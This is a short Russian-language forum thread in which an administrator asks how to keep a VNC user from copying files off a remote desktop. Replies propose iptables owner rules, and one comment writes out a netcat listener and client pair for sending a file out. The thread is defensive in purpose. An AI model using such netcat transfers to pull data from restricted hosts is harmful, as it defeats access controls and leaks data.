Подскажите пути решения

0

0

Поднимаю такую систему. Пользователю разрешено заходить на комп по VNC сессии. Соответсвенно ему предоставляется десктоп удаленной машины и он там может работать. Однако надо сделать так, что-бы он не мог оттуда ничего утащить. В плане активной безопасности я оттуда убрал приложения типа ftp, telnet и так далее. Но на сколько я понимаю пользователь смотжет сделать tar вайл и зааплоадить его через konquer к примеру? Как закрыть все возможности скачки для пользователя при том что демон VNC должен быть работоспособным?

Ссылка

←	Аппаратная защита канала

Проблемы с DNAT

→

Придумал способ заглушить через  iptables
--uid-owner userid
    Matches if the packet was created by a process with the given effective user id. 
--gid-owner groupid
    Matches if the packet was created by a process with the given effective group id. 


По идее должно сработать.

anonymous
(12.11.06 17:11:29 MSK)

Ссылка

У него остаётся последний шанс --- tar+cat на сервере, vncrecord+ocr на клиенте. :)

dn2010 ★★★★★
(12.11.06 17:29:22 MSK)

Ответ на: комментарий от dn2010 12.11.06 17:29:22 MSK

если у него разрешины исходящие соиденения то он может
сделать что-то подобное:

netcat для пересылки файла:
Сервер (куда писать файл): nc -v -w 30 -p 5600 l- > filename.back
Клиент: nc -v -w 2 10.0.1.1 5600 < filename

anonymous
(30.11.06 19:54:30 MSK)

Ссылка

Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.

←	Аппаратная защита канала

Security

Проблемы с DNAT

→

Похожие темы